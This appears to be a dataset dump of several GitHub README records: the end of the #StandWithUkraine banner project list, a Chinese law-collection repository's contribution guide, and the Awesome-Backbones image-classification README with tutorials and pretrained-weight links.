- [TinyGSM](https://github.com/vshymanskyy/TinyGSM) - A small Arduino library for GSM modules, that just works
- [wasm2native](https://github.com/vshymanskyy/wasm2native) - Turn WASI apps into native executables
- [node-wasm-run](https://github.com/wasm3/node-wasm-run) - Run arbitrary WASM/WASI files
- [embedded-wasm-apps](https://github.com/wasm3/embedded-wasm-apps) - Statically-compiled WebAssembly apps on any embedded platform
- [php-vast](https://github.com/sokil/php-vast) - VAST Ad generator and parser library on PHP
- [miband-js](https://github.com/vshymanskyy/miband-js) - A clean implementation of Mi Band 2 library for Browsers and Node.js, using WebBluetooth API
- [mailamie](https://github.com/micc83/mailamie) - A simple SMTP catch all server for testing written in PHP
- [ReStable](https://github.com/micc83/ReStable) - jQuery plugin that makes tables responsive converting them to HTML lists
- [phpbench](https://github.com/phpbench/phpbench) - PHPBench is a benchmark runner for PHP analogous to PHPUnit but for performance rather than correctness
- [Codeception](https://github.com/Codeception/Codeception) - Codeception is a modern full-stack testing framework for PHP. Inspired by BDD
- [PHPUnit](https://github.com/sebastianbergmann/phpunit) - PHPUnit is the most commonly used testing framework for PHP
- [Payum](https://github.com/Payum/Payum) - Payum is a PHP Payment processing library. It offers everything you need to work with payments
- [Soketi](https://github.com/soketi/soketi) - soketi is your simple, fast, and resilient open-source WebSockets server
- [PHPMailer](https://github.com/PHPMailer/PHPMailer) - The classic email sending library for PHP
- [Awesome Crystal](https://github.com/veelenga/awesome-crystal) - A collection of awesome Crystal libraries, tools, frameworks and software
- [bcrypt.net](https://github.com/BcryptNet/bcrypt.net) - Porting of bcrypt.codeplex.com with enhanced security, missing fixes, features and better .net support
- [lvgl-rs](https://github.com/rafaelcaricio/lvgl-rs) - Open-source Embedded GUI Library in Rust
- [iban-validation](https://github.com/jschaedl/iban-validation) - A small library for validating International BankAccount Numbers (IBANs)
- [portable-ascii](https://github.com/voku/portable-ascii) - Portable ASCII library - performance optimized (ascii) string functions for PHP
- [comfey](https://github.com/dejavu1987/comfey) - Comfey is a tiny data binding library inspired by React hook useState
- [terraform-aws-modules](https://github.com/terraform-aws-modules) - Collection of Terraform AWS modules supported by the community
- [USDCUP.io](https://github.com/elvismdev/usdcup.io) - Web App that finds and tracks the average price of USD vs CUP in the informal (street) market in Cuba
- [CherryPy](https://github.com/cherrypy/cherrypy) - A Minimalist Python Web Framework
- [Cheroot](https://github.com/cherrypy/cheroot) - A high-performance, pure-Python HTTP server used by CherryPy
- [octomachinery](https://github.com/sanitizers/octomachinery) - Invisible engine driving octobot machines. Simple, yet powerful. A pythonic framework for making GitHub Apps-powered bots
- [Better Go Playground](https://github.com/x1unix/go-playground) - Go playground alternative with syntax highlight, code autocomplete and WebAssembly support
- [Canvacord](https://github.com/CesiumLabs/canvacord) - Simple & easy to use image manipulation module for beginners
- [spaceship-prompt](https://github.com/spaceship-prompt/spaceship-prompt) — Minimalistic, powerful and extremely customizable Zsh prompt
- [wtfjs](https://github.com/denysdovhan/wtfjs) — A list of funny and tricky JavaScript examples
- [bash-handbook](https://github.com/denysdovhan/bash-handbook) — A handbook for those who want to learn Bash
- [vacuum-card](https://github.com/denysdovhan/vacuum-card) — Vacuum cleaner card for Home Assistant Lovelace UI
- [purifier-card](https://github.com/denysdovhan/purifier-card) — Air Purifier card for Home Assistant Lovelace UI
- [Moped](https://github.com/RobertoMachorro/Moped) - A general purpose text editor, small and light
- [fluent-vue](https://github.com/Demivan/fluent-vue) - Internationalization plugin for Vue.js
- [Kap](https://github.com/wulkano/Kap) - An open-source screen recorder built with web technology
- [bootScore](https://github.com/bootscore/bootscore) - A powerful, free Bootstrap 5 starter theme for WordPress
- [UAdata](https://github.com/uadata/uadata) - Ukrainian data hub with API
- [MahApps.Metro](https://github.com/MahApps/MahApps.Metro) - A toolkit for creating modern WPF applications. Lots of goodness out-of-the box
- [MahApps.Metro.IconPacks](https://github.com/MahApps/MahApps.Metro.IconPacks) - Awesome icon packs for WPF and UWP in one library
- [GongSolutions.WPF.DragDrop](https://github.com/punker76/gong-wpf-dragdrop) - An easy to use drag'n'drop framework for WPF
- [ElectricsEagles](https://github.com/Electrics-Eagles) - ElectricsEagles drones
- [PokeTube](https://github.com/iamashley0/poketube/) - An Youtube player thats focused on privacy
- [ProxyManager](https://github.com/Ocramius/ProxyManager) - A PHP library that aims to provide abstraction for generating various kinds of proxy classes
- [FAR.js](https://github.com/farjs/farjs) - Cross-platform File and ARchive Manager in your terminal
- [Stacks.js](https://github.com/stacksjs) - Develop modern clouds, apps & framework-agnostic libraries, faster
- [django-content-settings](https://github.com/occipital/django-content-settings) - The most advanced admin editable setting for Django
- [**...and more than 23000 others**](https://github.com/search?q=vshymanskyy%2FStandWithUkraine&type=code)
| #StandWithUkraine banner and related documents | ukraine,standwithukraine,stoprussionagression,stopputinnow,russia,belarus | 0 | 61 | 110 | 559 | 27 | 3 | 0 |
LawRefBook/Laws | ---
draft: true
---
本项目收集各类法律法规、部门规章、案例等,并将其按照章节等信息进行了处理。
## 应用
- [LawRefBook](https://github.com/RanKKI/LawRefBook) 是原生 iOS 应用,使用 SwiftUI 构建。
## 贡献指南
### 手动贡献
- 根据[法律法规模版](法律法规模版.md) 的格式,将法律法规放入 `法律法规` 文件夹下合适的位置
- 在 `scripts` 目录下运行 `python database.py`(会自动更新 `sqlite` 内容)
- 提交更改,并提 pr
### 自动脚本
`scripts` 目录下有一 `request.py` 脚本,支持从 [国家法律法规数据库](https://flk.npc.gov.cn) 爬取最新的法律法规。
在 `scripts` 目录下,执行以下指令
- `python requessts.py` (脚本会自动处理,将新增法律加入列表以及合适的位置)
- `python database.py` (会自动更新 `sqlite` 内容)
- 提交更改,并提 pr
---
PS 如果你有发现某部法律不完整,有问题,或者需要新增某些,但又不会自己提 pr,你可以在提一个 issue,或者直接联系设置中我的邮箱,我会在下个版本修复或增加 | null | null | 1 | 2 | 1 | 91 | 8 | 2 | 1 |
Fafa-DL/Awesome-Backbones | Awesome backbones for image classification
===========================
<div align="center">
[![BILIBILI](https://raw.githubusercontent.com/Fafa-DL/readme-data/main/Bilibili.png)](https://space.bilibili.com/46880349)
![](https://img.shields.io/badge/Awesome%20Backbones-v0.6.3-brightgreen)
![](https://img.shields.io/badge/PyTorch-%3E%3Dv1.7.1-green)
![](https://img.shields.io/badge/Python-%3E%3Dv3.6-yellowgreen)
[![GitHub forks](https://img.shields.io/github/forks/Fafa-DL/Awesome-Backbones)](https://github.com/Fafa-DL/Awesome-Backbones)
[![GitHub stars](https://img.shields.io/github/stars/Fafa-DL/Awesome-Backbones)](https://github.com/Fafa-DL/Awesome-Backbones)
</div>
## 写在前面
- 若训练效果不佳,首先需要调整学习率和Batch size,这俩超参很大程度上影响收敛。其次,从关闭图像增强手段(尤其小数据集)开始,有的图像增强方法会污染数据,如
![](https://raw.githubusercontent.com/Fafa-DL/readme-data/main/backbones/fail01.jpg) ![](https://raw.githubusercontent.com/Fafa-DL/readme-data/main/backbones/fail02.jpg) ![](https://raw.githubusercontent.com/Fafa-DL/readme-data/main/backbones/fail03.jpg)
  如何去除增强?如[efficientnetv2-b0](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/models/efficientnetv2/efficientnetv2_b0.py)配置文件中train_pipeline可更改为如下
```yaml
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='RandomResizedCrop',
size=192,
efficientnet_style=True,
interpolation='bicubic'),
dict(type='Normalize', **img_norm_cfg),
dict(type='ImageToTensor', keys=['img']),
dict(type='ToTensor', keys=['gt_label']),
dict(type='Collect', keys=['img', 'gt_label'])
]
```
  若你的数据集提前已经将shape更改为网络要求的尺寸,那么`Resize`操作也可以去除。
## 更新日志
**`2023.12.02`**
- 新增Issue中多人提及的输出**Train Acc**与**Val loss**
- `metrics_outputs.csv`保存每周期`train_loss, train_acc, train_precision, train_recall, train_f1-score, val_loss, val_acc, val_precision, val_recall, val_f1-score`方便各位绘图
- 终端由原先仅输出**Val**相关metrics升级为Train与Val都输出
![](https://raw.githubusercontent.com/Fafa-DL/readme-data/main/backbones/terminal.jpg)
**`2023.08.05`**
- 新增**TinyViT**(预训练权重不匹配)、**DeiT3**、**EdgeNeXt**、**RevVisionTransformer**
**`2023.03.07`**
- 新增**MobileViT**、**DaViT**、**RepLKNet**、**BEiT**、**EVA**、**MixMIM**、**EfficientNetV2**
**`2022.11.20`**
- 新增是否将测试集用作验证集选项,若不使用,从训练集按ratio划分验证集数量,随机从训练集某fold挑选作为验证集(类似k-fold但不是,可自己稍改达到k-fold目的),详见[Training tutorial](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/How_to_train.md)
**`2022.11.06`**
- 新增**HorNet**, **EfficientFormer**, **SwinTransformer V2**, **MViT**模型
## 测试环境
- Pytorch 1.7.1+
- Python 3.6+
## 资料
|数据集|视频教程|人工智能技术探讨群|
|---|---|---|
|[`花卉数据集` 提取码:0zat](https://pan.baidu.com/s/1137y4l-J3AgyCiC_cXqIqw)|[点我跳转](https://www.bilibili.com/video/BV1SY411P7Nd)|[1群:78174903](https://jq.qq.com/?_wv=1027&k=lY5KVICA)<br/>[3群:584723646](https://jq.qq.com/?_wv=1027&k=bakez5Yz)
## 快速开始
- 遵循[环境搭建](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/Environment_setting.md)完成配置
- 下载[MobileNetV3-Small](https://download.openmmlab.com/mmclassification/v0/mobilenet_v3/convert/mobilenet_v3_small-8427ecf0.pth)权重至**datas**下
- **Awesome-Backbones**文件夹下终端输入
```bash
python tools/single_test.py datas/cat-dog.png models/mobilenet/mobilenet_v3_small.py --classes-map datas/imageNet1kAnnotation.txt
```
## 教程
- [环境搭建](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/Environment_setting.md)
- [数据集准备](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/Data_preparing.md)
- [配置文件解释](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/Configs_description.md)
- [训练](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/How_to_train.md)
- [模型评估](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/How_to_eval.md)
- [计算Flops&Params](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/Calculate_Flops.md)
- [添加新的模型组件](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/Add_modules.md)
- [类别激活图可视化](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/CAM_visualization.md)
- [学习率策略可视化](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/Lr_visualization.md)
- [数据增强策略可视化](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/Pipeline_visualization.md)
## 模型
- [x] [LeNet5](https://ieeexplore.ieee.org/document/6795724)
- [x] [AlexNet](https://blog.csdn.net/zzh516451964zzh/article/details/124461111)
- [x] [VGG](https://blog.csdn.net/zzh516451964zzh/article/details/124477080)
- [x] [DenseNet](https://blog.csdn.net/zzh516451964zzh/article/details/124630832)
- [x] [ResNet](https://blog.csdn.net/zzh516451964zzh/article/details/124477575)
- [x] [Wide-ResNet](https://blog.csdn.net/zzh516451964zzh/article/details/124754437)
- [x] [ResNeXt](https://blog.csdn.net/zzh516451964zzh/article/details/124477919)
- [x] [SEResNet](https://blog.csdn.net/zzh516451964zzh/article/details/124478157)
- [x] [SEResNeXt](https://blog.csdn.net/zzh516451964zzh/article/details/124478347)
- [x] [RegNet](https://blog.csdn.net/zzh516451964zzh/article/details/124478426)
- [x] [MobileNetV2](https://blog.csdn.net/zzh516451964zzh/article/details/124478681)
- [x] [MobileNetV3](https://blog.csdn.net/zzh516451964zzh/article/details/124478770)
- [x] [ShuffleNetV1](https://blog.csdn.net/zzh516451964zzh/article/details/124479156)
- [x] [ShuffleNetV2](https://blog.csdn.net/zzh516451964zzh/article/details/124479336)
- [x] [EfficientNet](https://blog.csdn.net/zzh516451964zzh/article/details/124754493)
- [x] [RepVGG](https://blog.csdn.net/zzh516451964zzh/article/details/124479644)
- [x] [Res2Net](https://blog.csdn.net/zzh516451964zzh/article/details/124479467)
- [x] [ConvNeXt](https://blog.csdn.net/zzh516451964zzh/article/details/124481466)
- [x] [HRNet](https://blog.csdn.net/zzh516451964zzh/article/details/124481590)
- [x] [ConvMixer](https://blog.csdn.net/zzh516451964zzh/article/details/124481766)
- [x] [CSPNet](https://blog.csdn.net/zzh516451964zzh/article/details/124481930)
- [x] [Swin-Transformer](https://blog.csdn.net/zzh516451964zzh/article/details/124538198)
- [x] [Vision-Transformer](https://blog.csdn.net/zzh516451964zzh/article/details/124567953)
- [x] [Transformer-in-Transformer](https://blog.csdn.net/zzh516451964zzh/article/details/124596023)
- [x] [MLP-Mixer](https://blog.csdn.net/zzh516451964zzh/article/details/124596093)
- [x] [DeiT](https://blog.csdn.net/zzh516451964zzh/article/details/124591888)
- [x] [Conformer](https://blog.csdn.net/zzh516451964zzh/article/details/124596343)
- [x] [T2T-ViT](https://blog.csdn.net/zzh516451964zzh/article/details/124596425)
- [x] [Twins](https://blog.csdn.net/zzh516451964zzh/article/details/124596619)
- [x] [PoolFormer](https://blog.csdn.net/zzh516451964zzh/article/details/124596740)
- [x] [VAN](https://blog.csdn.net/zzh516451964zzh/article/details/124630541)
- [x] [HorNet](https://arxiv.org/pdf/2207.14284v2.pdf)
- [x] [EfficientFormer](https://arxiv.org/abs/2206.01191)
- [x] [Swin Transformer V2](https://arxiv.org/abs/2111.09883.pdf)
- [x] [MViT V2](http://openaccess.thecvf.com//content/CVPR2022/papers/Li_MViTv2_Improved_Multiscale_Vision_Transformers_for_Classification_and_Detection_CVPR_2022_paper.pdf)
- [x] [MobileViT](https://arxiv.org/abs/2110.02178)
- [x] [DaViT](https://arxiv.org/abs/2204.03645v1)
- [x] [replknet](https://arxiv.org/abs/2203.06717)
- [x] [BEiT](https://arxiv.org/abs/2106.08254)
- [x] [EVA](https://arxiv.org/abs/2211.07636)
- [x] [MixMIM](https://arxiv.org/abs/2205.13137)
- [x] [EfficientNetV2](https://arxiv.org/abs/2104.00298)
## 预训练权重
| 名称 | 权重 | 名称 | 权重 | 名称 | 权重 |
| :-----: | :-----: | :------: | :------: | :------: | :-----: |
| **LeNet5** | None | **AlexNet** | None | **VGG** | [VGG-11](https://download.openmmlab.com/mmclassification/v0/vgg/vgg11_batch256_imagenet_20210208-4271cd6c.pth)<br/>[VGG-13](https://download.openmmlab.com/mmclassification/v0/vgg/vgg13_batch256_imagenet_20210208-4d1d6080.pth)<br/>[VGG-16](https://download.openmmlab.com/mmclassification/v0/vgg/vgg16_batch256_imagenet_20210208-db26f1a5.pth)<br/>[VGG-19](https://download.openmmlab.com/mmclassification/v0/vgg/vgg19_batch256_imagenet_20210208-e6920e4a.pth)<br/>[VGG-11-BN](https://download.openmmlab.com/mmclassification/v0/vgg/vgg11_bn_batch256_imagenet_20210207-f244902c.pth)<br/>[VGG-13-BN](https://download.openmmlab.com/mmclassification/v0/vgg/vgg13_bn_batch256_imagenet_20210207-1a8b7864.pth)<br/>[VGG-16-BN](https://download.openmmlab.com/mmclassification/v0/vgg/vgg16_bn_batch256_imagenet_20210208-7e55cd29.pth)<br/>[VGG-19-BN](https://download.openmmlab.com/mmclassification/v0/vgg/vgg19_bn_batch256_imagenet_20210208-da620c4f.pth)|
| **ResNet** |[ResNet-18](https://download.openmmlab.com/mmclassification/v0/resnet/resnet18_8xb32_in1k_20210831-fbbb1da6.pth)<br/>[ResNet-34](https://download.openmmlab.com/mmclassification/v0/resnet/resnet34_8xb32_in1k_20210831-f257d4e6.pth)<br/>[ResNet-50](https://download.openmmlab.com/mmclassification/v0/resnet/resnet50_8xb32_in1k_20210831-ea4938fc.pth)<br/>[ResNet-101](https://download.openmmlab.com/mmclassification/v0/resnet/resnet101_8xb32_in1k_20210831-539c63f8.pth)<br/>[ResNet-152](https://download.openmmlab.com/mmclassification/v0/resnet/resnet152_8xb32_in1k_20210901-4d7582fa.pth) | **ResNetV1C** | [ResNetV1C-50](https://download.openmmlab.com/mmclassification/v0/resnet/resnetv1c50_8xb32_in1k_20220214-3343eccd.pth)<br/>[ResNetV1C-101](https://download.openmmlab.com/mmclassification/v0/resnet/resnetv1c101_8xb32_in1k_20220214-434fe45f.pth)<br/>[ResNetV1C-152](https://download.openmmlab.com/mmclassification/v0/resnet/resnetv1c152_8xb32_in1k_20220214-c013291f.pth) |**ResNetV1D** | [ResNetV1D-50](https://download.openmmlab.com/mmclassification/v0/resnet/resnetv1d50_b32x8_imagenet_20210531-db14775a.pth)<br/>[ResNetV1D-101](https://download.openmmlab.com/mmclassification/v0/resnet/resnetv1d101_b32x8_imagenet_20210531-6e13bcd3.pth)<br/>[ResNetV1D-152](https://download.openmmlab.com/mmclassification/v0/resnet/resnetv1d152_b32x8_imagenet_20210531-278cf22a.pth) |
| **ResNeXt** | [ResNeXt-50](https://download.openmmlab.com/mmclassification/v0/resnext/resnext50_32x4d_b32x8_imagenet_20210429-56066e27.pth)<br/>[ResNeXt-101](https://download.openmmlab.com/mmclassification/v0/resnext/resnext101_32x4d_b32x8_imagenet_20210506-e0fa3dd5.pth)<br/>[ResNeXt-152](https://download.openmmlab.com/mmclassification/v0/resnext/resnext152_32x4d_b32x8_imagenet_20210524-927787be.pth) | **SEResNet** | [SEResNet-50](https://download.openmmlab.com/mmclassification/v0/se-resnet/se-resnet50_batch256_imagenet_20200804-ae206104.pth)<br/>[SEResNet-101](https://download.openmmlab.com/mmclassification/v0/se-resnet/se-resnet101_batch256_imagenet_20200804-ba5b51d4.pth)| **SEResNeXt**| None|
| **RegNet** |[RegNetX-400MF](https://download.openmmlab.com/mmclassification/v0/regnet/regnetx-400mf_8xb128_in1k_20211213-89bfc226.pth)<br/>[RegNetX-800MF](https://download.openmmlab.com/mmclassification/v0/regnet/regnetx-800mf_8xb128_in1k_20211213-222b0f11.pth)<br/>[RegNetX-1.6GF](https://download.openmmlab.com/mmclassification/v0/regnet/regnetx-1.6gf_8xb128_in1k_20211213-d1b89758.pth)<br/>[RegNetX-3.2GF](https://download.openmmlab.com/mmclassification/v0/regnet/regnetx-3.2gf_8xb64_in1k_20211213-1fdd82ae.pth)<br/>[RegNetX-4.0GF](https://download.openmmlab.com/mmclassification/v0/regnet/regnetx-4.0gf_8xb64_in1k_20211213-efed675c.pth)<br/>[RegNetX-6.4GF](https://download.openmmlab.com/mmclassification/v0/regnet/regnetx-6.4gf_8xb64_in1k_20211215-5c6089da.pth)<br/>[RegNetX-8.0GF](https://download.openmmlab.com/mmclassification/v0/regnet/regnetx-8.0gf_8xb64_in1k_20211213-9a9fcc76.pth)<br/>[RegNetX-12GF](https://download.openmmlab.com/mmclassification/v0/regnet/regnetx-12gf_8xb64_in1k_20211213-5df8c2f8.pth) | **MobileNetV2** | [MobileNetV2](https://download.openmmlab.com/mmclassification/v0/mobilenet_v2/mobilenet_v2_batch256_imagenet_20200708-3b2dc3af.pth) |**MobileNetV3** | [MobileNetV3-Small](https://download.openmmlab.com/mmclassification/v0/mobilenet_v3/convert/mobilenet_v3_small-8427ecf0.pth)<br/>[MobileNetV3-Large](https://download.openmmlab.com/mmclassification/v0/mobilenet_v3/convert/mobilenet_v3_large-3ea3c186.pth) |
| **ShuffleNetV1** |[ShuffleNetV1](https://download.openmmlab.com/mmclassification/v0/shufflenet_v1/shufflenet_v1_batch1024_imagenet_20200804-5d6cec73.pth) | **ShuffleNetV2** | [ShuffleNetV2](https://download.openmmlab.com/mmclassification/v0/shufflenet_v2/shufflenet_v2_batch1024_imagenet_20200812-5bf4721e.pth) |**EfficientNet** | [EfficientNet-B0](https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b0_3rdparty_8xb32_in1k_20220119-a7e2a0b1.pth)<br/>[EfficientNet-B1](https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b1_3rdparty_8xb32_in1k_20220119-002556d9.pth)<br/>[EfficientNet-B2](https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b2_3rdparty_8xb32_in1k_20220119-ea374a30.pth)<br/>[EfficientNet-B3](https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b3_3rdparty_8xb32_in1k_20220119-4b4d7487.pth)<br/>[EfficientNet-B4](https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b4_3rdparty_8xb32_in1k_20220119-81fd4077.pth)<br/>[EfficientNet-B5](https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b5_3rdparty_8xb32_in1k_20220119-e9814430.pth)<br/>[EfficientNet-B6](https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b6_3rdparty_8xb32-aa_in1k_20220119-45b03310.pth)<br/>[EfficientNet-B7](https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b7_3rdparty_8xb32-aa_in1k_20220119-bf03951c.pth)<br/>[EfficientNet-B8](https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b8_3rdparty_8xb32-aa-advprop_in1k_20220119-297ce1b7.pth) |
| **RepVGG** |[RepVGG-A0](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-A0_3rdparty_4xb64-coslr-120e_in1k_20210909-883ab98c.pth)<br/>[RepVGG-A1](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-A1_3rdparty_4xb64-coslr-120e_in1k_20210909-24003a24.pth) <br/>[RepVGG-A2](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-A2_3rdparty_4xb64-coslr-120e_in1k_20210909-97d7695a.pth)<br/>[RepVGG-B0](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-B0_3rdparty_4xb64-coslr-120e_in1k_20210909-446375f4.pth)<br/>[RepVGG-B1](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-B1_3rdparty_4xb64-coslr-120e_in1k_20210909-750cdf67.pth)<br/>[RepVGG-A1](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-A1_3rdparty_4xb64-coslr-120e_in1k_20210909-24003a24.pth)<br/>[RepVGG-B1g2](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-B1g2_3rdparty_4xb64-coslr-120e_in1k_20210909-344f6422.pth)<br/>[RepVGG-B1g4](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-B1g4_3rdparty_4xb64-coslr-120e_in1k_20210909-d4c1a642.pth)<br/>[RepVGG-B2](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-B2_3rdparty_4xb64-coslr-120e_in1k_20210909-bd6b937c.pth)<br/>[RepVGG-B2g4](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-B2g4_3rdparty_4xb64-autoaug-lbs-mixup-coslr-200e_in1k_20210909-7b7955f0.pth)<br/>[RepVGG-B2g4](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-B2g4_3rdparty_4xb64-autoaug-lbs-mixup-coslr-200e_in1k_20210909-7b7955f0.pth)<br/>[RepVGG-B3](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-B3_3rdparty_4xb64-autoaug-lbs-mixup-coslr-200e_in1k_20210909-dda968bf.pth)<br/>[RepVGG-B3g4](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-B3g4_3rdparty_4xb64-autoaug-lbs-mixup-coslr-200e_in1k_20210909-4e54846a.pth)<br/>[RepVGG-D2se](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-D2se_3rdparty_4xb64-autoaug-lbs-mixup-coslr-200e_in1k_20210909-cf3139b7.pth)| **Res2Net** | [Res2Net-50-14w-8s](https://download.openmmlab.com/mmclassification/v0/res2net/res2net50-w14-s8_3rdparty_8xb32_in1k_20210927-bc967bf1.pth)<br/>[Res2Net-50-26w-8s](https://download.openmmlab.com/mmclassification/v0/res2net/res2net50-w26-s8_3rdparty_8xb32_in1k_20210927-f547a94b.pth)<br/>[Res2Net-101-26w-4s](https://download.openmmlab.com/mmclassification/v0/res2net/res2net101-w26-s4_3rdparty_8xb32_in1k_20210927-870b6c36.pth)<br/> |**ConvNeXt** | [ConvNeXt-Tiny](https://download.openmmlab.com/mmclassification/v0/convnext/convnext-tiny_3rdparty_32xb128_in1k_20220124-18abde00.pth)<br/>[ConvNeXt-Small](https://download.openmmlab.com/mmclassification/v0/convnext/convnext-small_3rdparty_32xb128_in1k_20220124-d39b5192.pth)<br/>[ConvNeXt-Base](https://download.openmmlab.com/mmclassification/v0/convnext/convnext-base_in21k-pre-3rdparty_32xb128_in1k_20220124-eb2d6ada.pth)<br/>[ConvNeXt-Large](https://download.openmmlab.com/mmclassification/v0/convnext/convnext-large_in21k-pre-3rdparty_64xb64_in1k_20220124-2412403d.pth)<br/>[ConvNeXt-XLarge](https://download.openmmlab.com/mmclassification/v0/convnext/convnext-xlarge_in21k-pre-3rdparty_64xb64_in1k_20220124-76b6863d.pth) |
| **HRNet** |[HRNet-W18](https://download.openmmlab.com/mmclassification/v0/hrnet/hrnet-w18_3rdparty_8xb32_in1k_20220120-0c10b180.pth)<br/>[HRNet-W30](https://download.openmmlab.com/mmclassification/v0/hrnet/hrnet-w30_3rdparty_8xb32_in1k_20220120-8aa3832f.pth) <br/>[HRNet-W32](https://download.openmmlab.com/mmclassification/v0/hrnet/hrnet-w32_3rdparty_8xb32_in1k_20220120-c394f1ab.pth)<br/>[HRNet-W40](https://download.openmmlab.com/mmclassification/v0/hrnet/hrnet-w40_3rdparty_8xb32_in1k_20220120-9a2dbfc5.pth)<br/>[HRNet-W44](https://download.openmmlab.com/mmclassification/v0/hrnet/hrnet-w44_3rdparty_8xb32_in1k_20220120-35d07f73.pth)<br/>[HRNet-W48](https://download.openmmlab.com/mmclassification/v0/hrnet/hrnet-w48_3rdparty_8xb32_in1k_20220120-e555ef50.pth)<br/>[HRNet-W64](https://download.openmmlab.com/mmclassification/v0/hrnet/hrnet-w64_3rdparty_8xb32_in1k_20220120-19126642.pth) | **ConvMixer** | [ConvMixer-768/32](https://download.openmmlab.com/mmclassification/v0/convmixer/convmixer-768-32_3rdparty_10xb64_in1k_20220323-bca1f7b8.pth)<br/>[ConvMixer-1024/20](https://download.openmmlab.com/mmclassification/v0/convmixer/convmixer-1024-20_3rdparty_10xb64_in1k_20220323-48f8aeba.pth)<br/>[ConvMixer-1536/20](https://download.openmmlab.com/mmclassification/v0/convmixer/convmixer-1536_20_3rdparty_10xb64_in1k_20220323-ea5786f3.pth) |**CSPNet** | [CSPDarkNet50](https://download.openmmlab.com/mmclassification/v0/cspnet/cspdarknet50_3rdparty_8xb32_in1k_20220329-bd275287.pth)<br/>[CSPResNet50](https://download.openmmlab.com/mmclassification/v0/cspnet/cspresnet50_3rdparty_8xb32_in1k_20220329-dd6dddfb.pth)<br/>[CSPResNeXt50](https://download.openmmlab.com/mmclassification/v0/cspnet/cspresnext50_3rdparty_8xb32_in1k_20220329-2cc84d21.pth) |
|**Swin Transformer**|[tiny-224](https://download.openmmlab.com/mmclassification/v0/swin-transformer/swin_tiny_224_b16x64_300e_imagenet_20210616_090925-66df6be6.pth)<br/>[small-224](https://download.openmmlab.com/mmclassification/v0/swin-transformer/swin_small_224_b16x64_300e_imagenet_20210615_110219-7f9d988b.pth)<br/>[base-224](https://download.openmmlab.com/mmclassification/v0/swin-transformer/swin_base_224_b16x64_300e_imagenet_20210616_190742-93230b0d.pth)<br/>[large-224](https://download.openmmlab.com/mmclassification/v0/swin-transformer/convert/swin_large_patch4_window7_224_22kto1k-5f0996db.pth)<br/>[base-384](https://download.openmmlab.com/mmclassification/v0/swin-transformer/convert/swin_base_patch4_window12_384_22kto1k-d59b0d1d.pth)<br/>[large-384](https://download.openmmlab.com/mmclassification/v0/swin-transformer/convert/swin_large_patch4_window12_384_22kto1k-0a40944b.pth)|**Vision Transformer**|[vit_base_p16_224](https://download.openmmlab.com/mmclassification/v0/vit/pretrain/vit-base-p16_3rdparty_pt-64xb64_in1k-224_20210928-02284250.pth)<br/>[vit_base_p32_224](https://download.openmmlab.com/mmclassification/v0/vit/pretrain/vit-base-p32_3rdparty_pt-64xb64_in1k-224_20210928-eee25dd4.pth)<br/>[vit_large_p16_224](https://download.openmmlab.com/mmclassification/v0/vit/pretrain/vit-large-p16_3rdparty_pt-64xb64_in1k-224_20210928-0001f9a1.pth)<br/>[vit_base_p16_384](https://download.openmmlab.com/mmclassification/v0/vit/finetune/vit-base-p16_in21k-pre-3rdparty_ft-64xb64_in1k-384_20210928-98e8652b.pth)<br/>[vit_base_p32_384](https://download.openmmlab.com/mmclassification/v0/vit/finetune/vit-base-p32_in21k-pre-3rdparty_ft-64xb64_in1k-384_20210928-9cea8599.pth)<br/>[vit_large_p16_384](https://download.openmmlab.com/mmclassification/v0/vit/finetune/vit-large-p16_in21k-pre-3rdparty_ft-64xb64_in1k-384_20210928-b20ba619.pth)|**Transformer in Transformer**|[TNT-small](https://download.openmmlab.com/mmclassification/v0/tnt/tnt-small-p16_3rdparty_in1k_20210903-c56ee7df.pth)|
